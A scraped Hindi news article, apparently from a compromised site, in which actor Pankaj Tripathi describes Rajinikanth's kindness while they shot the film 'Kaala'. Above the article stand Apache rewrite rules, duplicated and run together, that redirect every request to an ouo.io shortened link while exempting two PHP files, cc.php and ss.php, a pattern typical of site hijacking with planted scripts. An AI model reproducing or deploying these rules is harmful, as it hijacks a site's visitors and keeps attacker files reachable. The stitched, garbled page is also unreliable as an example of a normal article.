
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 544
Previous Nextमुंबई। शूटिंग के वक्त रजनीकांत अपना ही नहीं अपितु अपने साथियों का भी विशेष ध्यान रखते थे। यह बात बॉलीवुड एक्टर पंकज त्रिपाठी ने हाल ही में अपने अनुभव साझा किए हैं। पंकज त्रिपाठी ने फिल्म 'काला' में उनके साथ काम किया था। अपने अनुभव साझा करते हुए पंकज त्रिपाठी ने बताया कि फिल्म 'काला' की शूटिंग के दौरान रजनीकांत इस बात का ध्यान रखते थे कि मैंने समय पर खाना खाया है या नहीं। पंकज त्रिपाठी और रजनीकांत फिल्म 'काला' में एक साथ दिखाई देने वाले हैं।
फिल्म में पकंज एक पुलिसकर्मी के रोल में नजर आएंगे। यह उनकी पहली तमिल फिल्म है। पकंज ने कहा, "रजनी सर के साथ मेरा शूटिंग का अनुभव शानदार रहा। वह बहुत ही विनम्र हैं। हमारी एक्टिंग, आध्यात्मिकता और फिल्म इंडस्ट्री के बारे में बातचीत होती थी। वह कैमरे के सामने बिल्कुल अलग ही होते हैं। मैंने इस अनुभव से बहुत कुछ सीखा है।" उन्होंने कहा, "मैं जानता था कि मैं एक दिन ऐसी फिल्म का हिस्सा बनूंगा, जहां मुझे उन जैसे प्रतिभाशाली शख्स के साथ काम करने का मौका मिलेगा। जैसे ही यह ऑफर मेरे पास मैंने तुरंत हामी भर दी।" इस फिल्म के लेखक एवं निर्देशक पा. रंजीत हैं। इसमें नाना पाटेकर और हुमा कुरैशी भी हैं। अपनी मंझी हुई परफॉर्मेंस के लिए मशहूर पंकज गैंग्स ऑफ वासेपुर, न्यूटन, फुकरे रिटर्न्स, बरेली की बर्फी जैसी फिल्मों में अपनी बेहतरीन परफॉर्मेंस से चार चांद लगा चुके हैं।